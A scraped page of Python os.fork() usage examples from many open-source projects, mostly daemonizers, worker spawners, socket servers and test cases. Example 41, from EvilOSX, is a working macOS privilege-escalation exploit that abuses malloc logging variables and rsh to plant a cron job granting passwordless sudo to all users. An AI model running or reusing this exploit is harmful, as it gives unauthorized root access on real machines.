Python os.fork() Examples

The following are code examples for showing how to use os.fork(). They are from open source Python projects. You can vote up the examples you like or vote down the ones you don't like.

Example 1
Project: evolution-strategies-starter   Author: openai   File: main.py    MIT License 7 votes vote down vote up
def workers(master_host, master_port, relay_socket_path, num_workers):
    # Start the relay
    master_redis_cfg = {'host': master_host, 'port': master_port}
    relay_redis_cfg = {'unix_socket_path': relay_socket_path}
    if os.fork() == 0:
        RelayClient(master_redis_cfg, relay_redis_cfg).run()
        return
    # Start the workers
    noise = SharedNoiseTable()  # Workers share the same noise
    num_workers = num_workers if num_workers else os.cpu_count()
    logging.info('Spawning {} workers'.format(num_workers))
    for _ in range(num_workers):
        if os.fork() == 0:
            run_worker(relay_redis_cfg, noise=noise)
            return
    os.wait() 
Example 2
Project: pyblish-win   Author: pyblish   File: popen2.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def __init__(self, cmd, bufsize=-1):
        _cleanup()
        self.cmd = cmd
        p2cread, p2cwrite = os.pipe()
        c2pread, c2pwrite = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child
            os.dup2(p2cread, 0)
            os.dup2(c2pwrite, 1)
            os.dup2(c2pwrite, 2)
            self._run_child(cmd)
        os.close(p2cread)
        self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
        os.close(c2pwrite)
        self.fromchild = os.fdopen(c2pread, 'r', bufsize) 
Example 3
Project: pyblish-win   Author: pyblish   File: SocketServer.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def shutdown(self):
        """Stops the serve_forever loop.

        Blocks until the loop has finished. This must be called while
        serve_forever() is running in another thread, or it will
        deadlock.
        """
        self.__shutdown_request = True
        self.__is_shut_down.wait()

    # The distinction between handling, getting, processing and
    # finishing a request is fairly arbitrary.  Remember:
    #
    # - handle_request() is the top-level call.  It calls
    #   select, get_request(), verify_request() and process_request()
    # - get_request() is different for stream or datagram sockets
    # - process_request() is the place that may fork a new process
    #   or create a new thread to finish the request
    # - finish_request() instantiates the request handler class;
    #   this constructor will handle the request all by itself 
Example 4
Project: pyblish-win   Author: pyblish   File: SocketServer.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def process_request(self, request, client_address):
        """Fork a new subprocess to process the request."""
        self.collect_children()
        pid = os.fork()
        if pid:
            # Parent process
            if self.active_children is None:
                self.active_children = set()
            self.active_children.add(pid)
            self.close_request(request) #close handle in parent process
            return
        else:
            # Child process.
            # This must never return, hence os._exit()!
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
                os._exit(0)
            except:
                try:
                    self.handle_error(request, client_address)
                    self.shutdown_request(request)
                finally:
                    os._exit(1) 
Example 5
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def test_dummy_thread_after_fork(self):
        # Issue #14308: a dummy thread in the active list doesn't mess up
        # the after-fork mechanism.
        code = """if 1:
            import thread, threading, os, time

            def background_thread(evt):
                # Creates and registers the _DummyThread instance
                threading.current_thread()
                evt.set()
                time.sleep(10)

            evt = threading.Event()
            thread.start_new_thread(background_thread, (evt,))
            evt.wait()
            assert threading.active_count() == 2, threading.active_count()
            if os.fork() == 0:
                assert threading.active_count() == 1, threading.active_count()
                os._exit(0)
            else:
                os.wait()
        """
        _, out, err = assert_python_ok("-c", code)
        self.assertEqual(out, '')
        self.assertEqual(err, '') 
Example 6
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def test_3_join_in_forked_from_thread(self):
        # Like the test above, but fork() was called from a worker thread
        # In the forked process, the main Thread object must be marked as stopped.
        script = """if 1:
            main_thread = threading.current_thread()
            def worker():
                childpid = os.fork()
                if childpid != 0:
                    os.waitpid(childpid, 0)
                    sys.exit(0)

                t = threading.Thread(target=joiningfunc,
                                     args=(main_thread,))
                print 'end of main'
                t.start()
                t.join() # Should not block: main_thread is already stopped

            w = threading.Thread(target=worker)
            w.start()
            """
        self._run_and_join(script) 
Example 7
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def test_reinit_tls_after_fork(self):
        # Issue #13817: fork() would deadlock in a multithreaded program with
        # the ad-hoc TLS implementation.

        def do_fork_and_wait():
            # just fork a child process and wait it
            pid = os.fork()
            if pid > 0:
                os.waitpid(pid, 0)
            else:
                os._exit(0)

        # start a bunch of threads that will fork() child processes
        threads = []
        for i in range(16):
            t = threading.Thread(target=do_fork_and_wait)
            threads.append(t)
            t.start()

        for t in threads:
            t.join() 
Example 8
Project: pyblish-win   Author: pyblish   File: test_thread.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def test_forkinthread(self):
        def thread1():
            try:
                pid = os.fork() # fork in a thread
            except RuntimeError:
                sys.exit(0) # exit the child

            if pid == 0: # child
                os.close(self.read_fd)
                os.write(self.write_fd, "OK")
                sys.exit(0)
            else: # parent
                os.close(self.write_fd)

        thread.start_new_thread(thread1, ())
        self.assertEqual(os.read(self.read_fd, 2), "OK",
                         "Unable to fork() in thread") 
Example 9
Project: pyblish-win   Author: pyblish   File: test_uuid.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def testIssue8621(self):
        # On at least some versions of OSX uuid.uuid4 generates
        # the same sequence of UUIDs in the parent and any
        # children started using fork.
        fds = os.pipe()
        pid = os.fork()
        if pid == 0:
            os.close(fds[0])
            value = uuid.uuid4()
            os.write(fds[1], value.hex)
            os._exit(0)

        else:
            os.close(fds[1])
            self.addCleanup(os.close, fds[0])
            parent_value = uuid.uuid4().hex
            os.waitpid(pid, 0)
            child_value = os.read(fds[0], 100)

            self.assertNotEqual(parent_value, child_value) 
Example 10
Project: pyblish-win   Author: pyblish   File: test_platform.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def test_mac_ver_with_fork(self):
        # Issue7895: platform.mac_ver() crashes when using fork without exec
        #
        # This test checks that the fix for that issue works.
        #
        pid = os.fork()
        if pid == 0:
            # child
            info = platform.mac_ver()
            os._exit(0)

        else:
            # parent
            cpid, sts = os.waitpid(pid, 0)
            self.assertEqual(cpid, pid)
            self.assertEqual(sts, 0) 
Example 11
Project: pyblish-win   Author: pyblish   File: forking.py    GNU Lesser General Public License v3.0 6 votes vote down vote up
def get_command_line():
        '''
        Returns prefix of command line used for spawning a child process
        '''
        if getattr(process.current_process(), '_inheriting', False):
            raise RuntimeError('''
            Attempt to start a new process before the current process
            has finished its bootstrapping phase.

            This probably means that you are on Windows and you have
            forgotten to use the proper idiom in the main module:

                if __name__ == '__main__':
                    freeze_support()
                    ...

            The "freeze_support()" line can be omitted if the program
            is not going to be frozen to produce a Windows executable.''')

        if getattr(sys, 'frozen', False):
            return [sys.executable, '--multiprocessing-fork']
        else:
            prog = 'from multiprocessing.forking import main; main()'
            opts = util._args_from_interpreter_flags()
            return [_python_exe] + opts + ['-c', prog, '--multiprocessing-fork'] 
Example 12
Project: flasky   Author: RoseOu   File: arbiter.py    MIT License 6 votes vote down vote up
def reexec(self):
        """\
        Relaunch the master and workers.
        """
        if self.pidfile is not None:
            self.pidfile.rename("%s.oldbin" % self.pidfile.fname)

        self.reexec_pid = os.fork()
        if self.reexec_pid != 0:
            self.master_name = "Old Master"
            return

        environ = self.cfg.env_orig.copy()
        fds = [l.fileno() for l in self.LISTENERS]
        environ['GUNICORN_FD'] = ",".join([str(fd) for fd in fds])

        os.chdir(self.START_CTX['cwd'])
        self.cfg.pre_exec(self)

        # exec the process using the original environnement
        os.execvpe(self.START_CTX[0], self.START_CTX['args'], environ) 
Example 13
Project: core   Author: lifemapper   File: daemon.py    GNU General Public License v3.0 6 votes vote down vote up
def daemonize(self):
        """
        @summary: do the UNIX double-fork magic, see Stevens' "Advanced
                Programming in the UNIX Environment" for details (ISBN 0201563177)
                http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
        """
        try:
            pid = os.fork()
            if pid > 0:
                # exit first parent
                sys.exit(0)
        except OSError, e:
            self.log.error("Fork #1 failed: %d (%s)" % e.errno, e.strerror)
            sys.exit(1)
         
        # decouple from parent environment 
Example 14
Project: InsightAgent   Author: insightfinder   File: insightagent-boilerplate.py    Apache License 2.0 6 votes vote down vote up
def start_data_processing(thread_number):
    """ TODO: replace with your code.
    Most work regarding sending to IF is abstracted away for you.
    This function will get the data to send and prepare it for the API.
    The general outline should be:
    0. Define the project type in config.ini
    1. Parse config options
    2. Gather data
    3. Parse each entry
    4. Call the appropriate handoff function
        metric_handoff()
        log_handoff()
        alert_handoff()
        incident_handoff()
        deployment_handoff()
    See zipkin for an example that uses os.fork to send both metric and log data.
    """ 
Example 15
Project: InsightAgent   Author: insightfinder   File: insightagent-boilerplate.py    Apache License 2.0 6 votes vote down vote up
def start_data_processing(thread_number):
    """ TODO: replace with your code.
    Most work regarding sending to IF is abstracted away for you.
    This function will get the data to send and prepare it for the API.
    The general outline should be:
    0. Define the project type in config.ini
    1. Parse config options
    2. Gather data
    3. Parse each entry
    4. Call the appropriate handoff function
        metric_handoff()
        log_handoff()
        alert_handoff()
        incident_handoff()
        deployment_handoff()
    See zipkin for an example that uses os.fork to send both metric and log data.
    """ 
Example 16
Project: InsightAgent   Author: insightfinder   File: getmetrics_zipkin.py    Apache License 2.0 6 votes vote down vote up
def start_data_processing():
    """ get traces from the last <samplingInterval> minutes """
    # fork off a process to handle metric agent
    parent = os.fork()
    if parent > 0:
        track['mode'] = "LOG"
        if_config_vars['projectName'] += '-log'
        logger.debug(str(os.getpid()) + ' is running the log agent')
    else:
        track['mode'] = "METRIC"
        if_config_vars['projectName'] += '-metric'
        logger.debug(str(os.getpid()) + ' is running the metric agent')
    timestamp_fixed = int(time.time() * 1000)
    traces = zipkin_get_traces()
    for trace in traces:
        for span in trace:
            process_zipkin_span(timestamp_fixed, span) 
Example 17
Project: steamlink   Author: steamlink   File: util.py    MIT License 6 votes vote down vote up
def daemonize() -> None:
	"""Move current process to daemon process."""
	# Create first fork
	pid = os.fork()
	if pid > 0:
		sys.exit(0)

	# Decouple fork
	os.setsid()

	# Create second fork
	pid = os.fork()
	if pid > 0:
		sys.exit(0)

	# redirect standard file descriptors to devnull
	infd = open(os.devnull, 'r')
	outfd = open(os.devnull, 'a+')
	sys.stdout.flush()
	sys.stderr.flush()
	os.dup2(infd.fileno(), sys.stdin.fileno())
	os.dup2(outfd.fileno(), sys.stdout.fileno())
	os.dup2(outfd.fileno(), sys.stderr.fileno()) 
Example 18
Project: rtp_cluster   Author: sippy   File: misc.py    BSD 2-Clause "Simplified" License 6 votes vote down vote up
def daemonize(logfile = None):
    # Fork once
    if os.fork() != 0:
        os._exit(0)
    # Create new session
    os.setsid()
    if os.fork() != 0:
        os._exit(0)
    os.chdir('/')
    fd = os.open('/dev/null', os.O_RDWR)
    os.dup2(fd, sys.__stdin__.fileno())
    if logfile != None:
        fake_stdout = open(logfile, 'a', 1)
        sys.stdout = fake_stdout
        sys.stderr = fake_stdout
        fd = fake_stdout.fileno()
    os.dup2(fd, sys.__stdout__.fileno())
    os.dup2(fd, sys.__stderr__.fileno())
    if logfile == None:
        os.close(fd) 
Example 19
Project: gcp-variant-transforms   Author: googlegenomics   File: vcf_parser.py    Apache License 2.0 6 votes vote down vote up
def _init_with_header(self, header_lines):
    # PySam requires a version header to be present, so add one if absent.
    if header_lines and not header_lines[0].startswith(
        FILE_FORMAT_HEADER_TEMPLATE.format(VERSION='')):
      header_lines.insert(0, FILE_FORMAT_HEADER_TEMPLATE.format(VERSION='4.0'))

    # Pysam pipe is responsible for supplying lines from child process into the
    # VariantFile, since it can only take an actual file descriptor as an input.
    pysam_read, pysam_write = os.pipe()
    # Since child process doesn't have access to the lines that need to be
    # parsed, variants pipe is needed to supply them from _get_variant() method
    # into the child process, to be propagated afterwards into the pysam pipe.
    variants_read, variants_write = os.pipe()
    pid = os.fork()
    if pid:
      self._process_pid = pid
      self._init_parent_process(pysam_read, variants_write)
    else:
      self._init_child_process(variants_read, pysam_write, header_lines) 
Example 20
Project: Repobot   Author: Desgard   File: socketserver.py    MIT License 6 votes vote down vote up
def process_request(self, request, client_address):
        """Fork a new subprocess to process the request."""
        pid = os.fork()
        if pid:
            # Parent process
            if self.active_children is None:
                self.active_children = []
            self.active_children.append(pid)
            self.close_request(request)
            return
        else:
            # Child process.
            # This must never return, hence os._exit()!
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
                os._exit(0)
            except:
                try:
                    self.handle_error(request, client_address)
                    self.shutdown_request(request)
                finally:
                    os._exit(1) 
Example 21
Project: vscode-mayapy   Author: FXTD-ODYSSEY   File: _pydev_SocketServer.py    MIT License 6 votes vote down vote up
def shutdown(self):
        """Stops the serve_forever loop.

        Blocks until the loop has finished. This must be called while
        serve_forever() is running in another thread, or it will
        deadlock.
        """
        self.__shutdown_request = True
        self.__is_shut_down.wait()

    # The distinction between handling, getting, processing and
    # finishing a request is fairly arbitrary.  Remember:
    #
    # - handle_request() is the top-level call.  It calls
    #   select, get_request(), verify_request() and process_request()
    # - get_request() is different for stream or datagram sockets
    # - process_request() is the place that may fork a new process
    #   or create a new thread to finish the request
    # - finish_request() instantiates the request handler class;
    #   this constructor will handle the request all by itself 
Example 22
Project: vscode-mayapy   Author: FXTD-ODYSSEY   File: _pydev_SocketServer.py    MIT License 6 votes vote down vote up
def process_request(self, request, client_address):
        """Fork a new subprocess to process the request."""
        self.collect_children()
        pid = os.fork()  # @UndefinedVariable
        if pid:
            # Parent process
            if self.active_children is None:
                self.active_children = []
            self.active_children.append(pid)
            self.close_request(request) #close handle in parent process
            return
        else:
            # Child process.
            # This must never return, hence os._exit()!
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
                os._exit(0)
            except:
                try:
                    self.handle_error(request, client_address)
                    self.shutdown_request(request)
                finally:
                    os._exit(1) 
Example 23
Project: PiFan   Author: Dualion   File: daemon.py    GNU General Public License v2.0 6 votes vote down vote up
def daemonize(self):
        """
        do the UNIX double-fork magic, see Stevens' "Advanced
        Programming in the UNIX Environment" for details (ISBN 0201563177)
        """
        # Finish up with the current stdout/stderr
        sys.stdout.flush()
        sys.stderr.flush()
        try:
            pid = os.fork()
            if pid > 0:
                # exit first parent
                sys.exit(0)
        except OSError, e:
            sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1)

        # decouple from parent environment 
Example 24
Project: py   Author: pytest-dev   File: forkedfunc.py    MIT License 6 votes vote down vote up
def __init__(self, fun, args=None, kwargs=None, nice_level=0,
                 child_on_start=None, child_on_exit=None):
        if args is None:
            args = []
        if kwargs is None:
            kwargs = {}
        self.fun = fun
        self.args = args
        self.kwargs = kwargs
        self.tempdir = tempdir = py.path.local.mkdtemp()
        self.RETVAL = tempdir.ensure('retval')
        self.STDOUT = tempdir.ensure('stdout')
        self.STDERR = tempdir.ensure('stderr')

        pid = os.fork()
        if pid:  # in parent process
            self.pid = pid
        else:  # in child process
            self.pid = None
            self._child(nice_level, child_on_start, child_on_exit) 
Example 25
Project: pyblish-win   Author: pyblish   File: popen2.py    GNU Lesser General Public License v3.0 5 votes vote down vote up
def __init__(self, cmd, capturestderr=False, bufsize=-1):
        """The parameter 'cmd' is the shell command to execute in a
        sub-process.  On UNIX, 'cmd' may be a sequence, in which case arguments
        will be passed directly to the program without shell intervention (as
        with os.spawnv()).  If 'cmd' is a string it will be passed to the shell
        (as with os.system()).   The 'capturestderr' flag, if true, specifies
        that the object should capture standard error output of the child
        process.  The default is false.  If the 'bufsize' parameter is
        specified, it specifies the size of the I/O buffers to/from the child
        process."""
        _cleanup()
        self.cmd = cmd
        p2cread, p2cwrite = os.pipe()
        c2pread, c2pwrite = os.pipe()
        if capturestderr:
            errout, errin = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child
            os.dup2(p2cread, 0)
            os.dup2(c2pwrite, 1)
            if capturestderr:
                os.dup2(errin, 2)
            self._run_child(cmd)
        os.close(p2cread)
        self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
        os.close(c2pwrite)
        self.fromchild = os.fdopen(c2pread, 'r', bufsize)
        if capturestderr:
            os.close(errin)
            self.childerr = os.fdopen(errout, 'r', bufsize)
        else:
            self.childerr = None 
Example 26
Project: pyblish-win   Author: pyblish   File: subprocess.py    GNU Lesser General Public License v3.0 5 votes vote down vote up
def pipe_cloexec(self):
            """Create a pipe with FDs set CLOEXEC."""
            # Pipes' FDs are set CLOEXEC by default because we don't want them
            # to be inherited by other subprocesses: the CLOEXEC flag is removed
            # from the child's FDs by _dup2(), between fork() and exec().
            # This is not atomic: we would need the pipe2() syscall for that.
            r, w = os.pipe()
            self._set_cloexec_flag(r)
            self._set_cloexec_flag(w)
            return r, w 
Example 27
Project: pyblish-win   Author: pyblish   File: test_signal.py    GNU Lesser General Public License v3.0 5 votes vote down vote up
def test_main(self):
        # This function spawns a child process to insulate the main
        # test-running process from all the signals. It then
        # communicates with that child process over a pipe and
        # re-raises information about any exceptions the child
        # raises. The real work happens in self.run_test().
        os_done_r, os_done_w = os.pipe()
        with closing(os.fdopen(os_done_r)) as done_r, \
             closing(os.fdopen(os_done_w, 'w')) as done_w:
            child = os.fork()
            if child == 0:
                # In the child process; run the test and report results
                # through the pipe.
                try:
                    done_r.close()
                    # Have to close done_w again here because
                    # exit_subprocess() will skip the enclosing with block.
                    with closing(done_w):
                        try:
                            self.run_test()
                        except:
                            pickle.dump(traceback.format_exc(), done_w)
                        else:
                            pickle.dump(None, done_w)
                except:
                    print 'Uh oh, raised from pickle.'
                    traceback.print_exc()
                finally:
                    exit_subprocess()

            done_w.close()
            # Block for up to MAX_DURATION seconds for the test to finish.
            r, w, x = select.select([done_r], [], [], self.MAX_DURATION)
            if done_r in r:
                tb = pickle.load(done_r)
                if tb:
                    self.fail(tb)
            else:
                os.kill(child, signal.SIGKILL)
                self.fail('Test deadlocked after %d seconds.' %
                          self.MAX_DURATION) 
Example 28
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0 5 votes vote down vote up
def test_2_join_in_forked_process(self):
        # Like the test above, but from a forked interpreter
        script = """if 1:
            childpid = os.fork()
            if childpid != 0:
                os.waitpid(childpid, 0)
                sys.exit(0)

            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            print 'end of main'
            """
        self._run_and_join(script) 
Example 29
Project: pyblish-win   Author: pyblish   File: test_socketserver.py    GNU Lesser General Public License v3.0 5 votes vote down vote up
def simple_subprocess(testcase):
    pid = os.fork()
    if pid == 0:
        # Don't raise an exception; it would be caught by the test harness.
        os._exit(72)
    yield None
    pid2, status = os.waitpid(pid, 0)
    testcase.assertEqual(pid2, pid)
    testcase.assertEqual(72 << 8, status) 
Example 30
Project: pyblish-win   Author: pyblish   File: fork_wait.py    GNU Lesser General Public License v3.0 5 votes vote down vote up
def test_wait(self):
        for i in range(NUM_THREADS):
            thread.start_new(self.f, (i,))

        time.sleep(LONGSLEEP)

        a = self.alive.keys()
        a.sort()
        self.assertEqual(a, range(NUM_THREADS))

        prefork_lives = self.alive.copy()

        if sys.platform in ['unixware7']:
            cpid = os.fork1()
        else:
            cpid = os.fork()

        if cpid == 0:
            # Child
            time.sleep(LONGSLEEP)
            n = 0
            for key in self.alive:
                if self.alive[key] != prefork_lives[key]:
                    n += 1
            os._exit(n)
        else:
            # Parent
            self.wait_impl(cpid)
            # Tell threads to die
            self.stop = 1
            time.sleep(2*SHORTSLEEP) # Wait for threads to die 
Example 31
Project: pyblish-win   Author: pyblish   File: test_mailbox.py    GNU Lesser General Public License v3.0 5 votes vote down vote up
def test_lock_conflict(self):
        # Fork off a child process that will lock the mailbox temporarily,
        # unlock it and exit.
        c, p = socket.socketpair()
        self.addCleanup(c.close)
        self.addCleanup(p.close)

        pid = os.fork()
        if pid == 0:
            # child
            try:
                # lock the mailbox, and signal the parent it can proceed
                self._box.lock()
                c.send(b'c')

                # wait until the parent is done, and unlock the mailbox
                c.recv(1)
                self._box.unlock()
            finally:
                os._exit(0)

        # In the parent, wait until the child signals it locked the mailbox.
        p.recv(1)
        try:
            self.assertRaises(mailbox.ExternalClashError,
                              self._box.lock)
        finally:
            # Signal the child it can now release the lock and exit.
            p.send(b'p')
            # Wait for child to exit.  Locking should now succeed.
            exited_pid, status = os.waitpid(pid, 0)

        self._box.lock()
        self._box.unlock() 
Example 32
Project: pyblish-win   Author: pyblish   File: forking.py    GNU Lesser General Public License v3.0 5 votes vote down vote up
def __init__(self, process_obj):
            sys.stdout.flush()
            sys.stderr.flush()
            self.returncode = None

            self.pid = os.fork()
            if self.pid == 0:
                if 'random' in sys.modules:
                    import random
                    random.seed()
                code = process_obj._bootstrap()
                sys.stdout.flush()
                sys.stderr.flush()
                os._exit(code) 
Example 33
Project: pyblish-win   Author: pyblish   File: forking.py    GNU Lesser General Public License v3.0 5 votes vote down vote up
def is_forking(argv):
        '''
        Return whether commandline indicates we are forking
        '''
        if len(argv) >= 2 and argv[1] == '--multiprocessing-fork':
            assert len(argv) == 3
            return True
        else:
            return False 
Example 34
Project: Learning-Concurrency-in-Python   Author: PacktPublishing   File: forking.py    MIT License 5 votes vote down vote up
def parent(): 
  print("We are in the parent process with PID= %d"%os.getpid())
  newRef=os.fork() 
  if newRef==0: 
    child() 
  else: 
    print("We are in the parent process and our child process has PID= %d"%newRef) 
Example 35
Project: Ansible-Example-AB2018   Author: umit-ozturk   File: async_wrapper.py    MIT License 5 votes vote down vote up
def daemonize_self():
    # daemonizing code: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66012
    try:
        pid = os.fork()
        if pid > 0:
            # exit first parent
            sys.exit(0)
    except OSError:
        e = sys.exc_info()[1]
        sys.exit("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))

    # decouple from parent environment (does not chdir / to keep the directory context the same as for non async tasks)
    os.setsid()
    os.umask(int('022', 8))

    # do second fork
    try:
        pid = os.fork()
        if pid > 0:
            # print "Daemon PID %d" % pid
            sys.exit(0)
    except OSError:
        e = sys.exc_info()[1]
        sys.exit("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))

    dev_null = open('/dev/null', 'w')
    os.dup2(dev_null.fileno(), sys.stdin.fileno())
    os.dup2(dev_null.fileno(), sys.stdout.fileno())
    os.dup2(dev_null.fileno(), sys.stderr.fileno())


# NB: this function copied from module_utils/json_utils.py. Ensure any changes are propagated there.
# FUTURE: AnsibleModule-ify this module so it's Ansiballz-compatible and can use the module_utils copy of this function. 
Example 36
Project: flasky   Author: RoseOu   File: arbiter.py    MIT License 5 votes vote down vote up
def spawn_worker(self):
        self.worker_age += 1
        worker = self.worker_class(self.worker_age, self.pid, self.LISTENERS,
                                   self.app, self.timeout / 2.0,
                                   self.cfg, self.log)
        self.cfg.pre_fork(self, worker)
        pid = os.fork()
        if pid != 0:
            self.WORKERS[pid] = worker
            return pid

        # Process Child
        worker_pid = os.getpid()
        try:
            util._setproctitle("worker [%s]" % self.proc_name)
            self.log.info("Booting worker with pid: %s", worker_pid)
            self.cfg.post_fork(self, worker)
            worker.init_process()
            sys.exit(0)
        except SystemExit:
            raise
        except AppImportError as e:
            self.log.debug("Exception while loading the application: \n%s",
                           traceback.format_exc())
            print("%s" % e, file=sys.stderr)
            sys.stderr.flush()
            sys.exit(self.APP_LOAD_ERROR)
        except:
            self.log.exception("Exception in worker process:\n%s",
                               traceback.format_exc())
            if not worker.booted:
                sys.exit(self.WORKER_BOOT_ERROR)
            sys.exit(-1)
        finally:
            self.log.info("Worker exiting (pid: %s)", worker_pid)
            try:
                worker.tmp.close()
                self.cfg.worker_exit(self, worker)
            except:
                pass 
Example 37
Project: InsightAgent   Author: insightfinder   File: getmessages_prometheus.py    Apache License 2.0 5 votes vote down vote up
def start_data_processing(thread_number):
    end_time = int(time.time())
    start_time = end_time - if_config_vars['run_interval']

    pid = 0 if 'METRIC' in if_config_vars['project_type'] else 1
    if len(if_config_vars['project_type']) > 1:
        pid = os.fork()
    if pid == 0:
        # metric
        logger.debug(str(os.getpid()) + ' is running the metric agent')
        dispatch_metric_agent(start_time, end_time)
    else:
        # alert agent
        logger.debug(str(os.getpid()) + ' is running the alert agent')
        dispatch_alert_agent(start_time) 
Example 38
Project: ngo-addons-backport   Author: camptocamp   File: workers.py    GNU Affero General Public License v3.0 5 votes vote down vote up
def worker_spawn(self, klass, workers_registry):
        self.generation += 1
        worker = klass(self)
        pid = os.fork()
        if pid != 0:
            worker.pid = pid
            self.workers[pid] = worker
            workers_registry[pid] = worker
            return worker
        else:
            worker.run()
            sys.exit(0) 
Example 39
Project: testing.postgresql   Author: tk0miya   File: test_postgresql.py    Apache License 2.0 5 votes vote down vote up
def test_fork(self):
        pgsql = testing.postgresql.Postgresql()
        if os.fork() == 0:
            del pgsql
            pgsql = None
            os.kill(os.getpid(), signal.SIGTERM)  # exit tests FORCELY
        else:
            os.wait()
            sleep(1)
            self.assertTrue(pgsql.is_alive())  # process is alive (delete pgsql obj in child does not effect) 
Example 40
Project: testing.postgresql   Author: tk0miya   File: test_postgresql.py    Apache License 2.0 5 votes vote down vote up
def test_stop_on_child_process(self):
        pgsql = testing.postgresql.Postgresql()
        if os.fork() == 0:
            pgsql.stop()
            os.kill(pgsql.server_pid, 0)  # process is alive (calling stop() is ignored)
            os.kill(os.getpid(), signal.SIGTERM)  # exit tests FORCELY
        else:
            os.wait()
            sleep(1)
            self.assertTrue(pgsql.is_alive())  # process is alive (calling stop() in child is ignored) 
Example 41
Project: EvilOSX   Author: cys3c   File: LPE_10-10-5.py    GNU General Public License v3.0 5 votes vote down vote up
def get_root():
    env = {}
    old_size = os.stat("/etc/sudoers").st_size

    env['MallocLogFile'] = '/etc/crontab'
    env['MallocStackLogging'] = 'yes'
    env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'

    print "Creating /etc/crontab..."

    p = os.fork()
    if p == 0:
        os.close(1)
        os.close(2)
        os.execve("/usr/bin/rsh", ["rsh", "localhost"], env)

    time.sleep(1)

    if "NOPASSWD" not in open("/etc/crontab").read():
        print "FAILED!"
        exit(-1)

    print "Done, waiting for /etc/sudoers to update..."

    while os.stat("/etc/sudoers").st_size == old_size:
        time.sleep(1)

    print "Exploit completed."
    os.system("sudo rm -rf /etc/crontab")
    exit() 
Example 42
Project: openhatch   Author: campbe13   File: platforms.py    GNU Affero General Public License v3.0 5 votes vote down vote up
def _detach(self):
        if os.fork() == 0:      # first child
            os.setsid()         # create new session
            if os.fork() > 0:   # second child
                os._exit(0)
        else:
            os._exit(0)
        return self 
Example 43
Project: openhatch   Author: campbe13   File: case.py    GNU Affero General Public License v3.0 5 votes vote down vote up
def _fork_and_exec(self):
        pid = os.fork()
        if pid == 0:
            from celery import current_app
            current_app.worker_main(["celeryd", "--loglevel=DEBUG",
                                                "-n", self.hostname])
            os._exit(0)
        self.pid = pid 
Example 44
Project: certidude   Author: laurivosandi   File: __init__.py    MIT License 5 votes vote down vote up
def fork(self):
        for j in range(self.FORKS):
            if not os.fork():
                self.run()
                return True
        return False 
Example 45
Project: metlab   Author: norling   File: controller.py    GNU General Public License v3.0 5 votes vote down vote up
def metlab_controller(socket_name = "metlab.sock"):
    
    try: # Fork a child process so the parent can exit.
       pid = os.fork()
    except OSError as e:
       raise Exception("%d: %s" % (e.errno, e.strerror))
    if (pid == 0):
       os.setsid()
    else:
       os._exit(0)
    
    controller = MetLabController(socket_name = socket_name)
    controller.run() 
Example 46
Project: Repobot   Author: Desgard   File: test__UserFriendlyRNG.py    MIT License 5 votes vote down vote up
def runTest(self):
        # Another regression test for CVE-2013-1445.  This is basically the
        # same as RNGForkTest, but less compatible with old versions of Python,
        # and a little easier to read.

        n_procs = 5
        manager = multiprocessing.Manager()
        queues = [manager.Queue(1) for i in range(n_procs)]

        # Reseed the pool
        time.sleep(0.15)
        Crypto.Random._UserFriendlyRNG._get_singleton().reinit()
        Crypto.Random.get_random_bytes(1)

        # Start the child processes
        pool = multiprocessing.Pool(processes=n_procs, initializer=Crypto.Random.atfork)
        map_result = pool.map_async(_task_main, queues)

        # Get the results, ensuring that no pool processes are reused.
        aa = [queues[i].get(30) for i in range(n_procs)]
        bb = [queues[i].get(30) for i in range(n_procs)]
        res = list(zip(aa, bb))

        # Shut down the pool
        map_result.get(30)
        pool.close()
        pool.join()

        # Check that the results are unique
        if len(set(aa)) != len(aa) or len(set(res)) != len(res):
            raise AssertionError("RNG output duplicated across fork():\n%s" %
                                 (pprint.pformat(res),)) 
Example 47
Project: Repobot   Author: Desgard   File: _UserFriendlyRNG.py    MIT License 5 votes vote down vote up
def _check_pid(self):
        # Lame fork detection to remind developers to invoke Random.atfork()
        # after every call to os.fork().  Note that this check is not reliable,
        # since process IDs can be reused on most operating systems.
        #
        # You need to do Random.atfork() in the child process after every call
        # to os.fork() to avoid reusing PRNG state.  If you want to avoid
        # leaking PRNG state to child processes (for example, if you are using
        # os.setuid()) then you should also invoke Random.atfork() in the
        # *parent* process.
        if os.getpid() != self._pid:
            raise AssertionError("PID check failed. RNG must be re-initialized after fork(). Hint: Try Random.atfork()") 
Example 48
Project: Repobot   Author: Desgard   File: _fork_pty.py    MIT License 5 votes vote down vote up
def fork_pty():
    '''This implements a substitute for the forkpty system call. This
    should be more portable than the pty.fork() function. Specifically,
    this should work on Solaris.

    Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to
    resolve the issue with Python's pty.fork() not supporting Solaris,
    particularly ssh. Based on patch to posixmodule.c authored by Noah
    Spurrier::

        http://mail.python.org/pipermail/python-dev/2003-May/035281.html

    '''

    parent_fd, child_fd = os.openpty()
    if parent_fd < 0 or child_fd < 0:
